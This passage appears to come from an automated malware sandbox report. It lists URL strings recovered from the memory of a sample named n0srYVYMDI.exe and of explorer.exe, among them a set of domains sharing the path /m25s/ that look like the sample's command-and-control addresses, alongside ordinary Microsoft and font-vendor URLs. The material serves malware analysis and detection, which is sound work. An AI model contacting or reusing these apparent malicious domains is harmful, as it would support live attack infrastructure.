          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.info
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.info/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.info/m25s/www.xewaov.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.newordforpurpose.infoReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond
          Source: explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bond/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oches-a-credito-es.bondReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.design
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.design/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.design/m25s/www.orean-course-289113002.zone
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onnorbell.designReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zone/m25s/www.ransportationmwmptpro.top
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orean-course-289113002.zoneReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyou
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyou/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyou/m25s/www.cctofi.cpa
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raceg.cyouReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.top
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.top/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.top/m25s/www.newordforpurpose.info
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ransportationmwmptpro.topReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp, n0srYVYMDI.exe, 00000000.00000002.1729852397.000000000637E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.today/m25s/www.vitor.live
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uy-smart-tv-nl.todayReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.live
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.live/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.live/m25s/www.raceg.cyou
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vitor.liveReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.net/m25s/www.armanshop.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wistlnc.netReferer:
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyz/m25s/www.39474.club
          Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xewaov.xyzReferer:
          Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000003.3495294226.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000000.1728291050.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000000.1725122365.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4170182373.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1726392086.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.0000000009701000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000002.4176155250.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1732979117.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107210219.0000000009701000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000000.1728291050.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
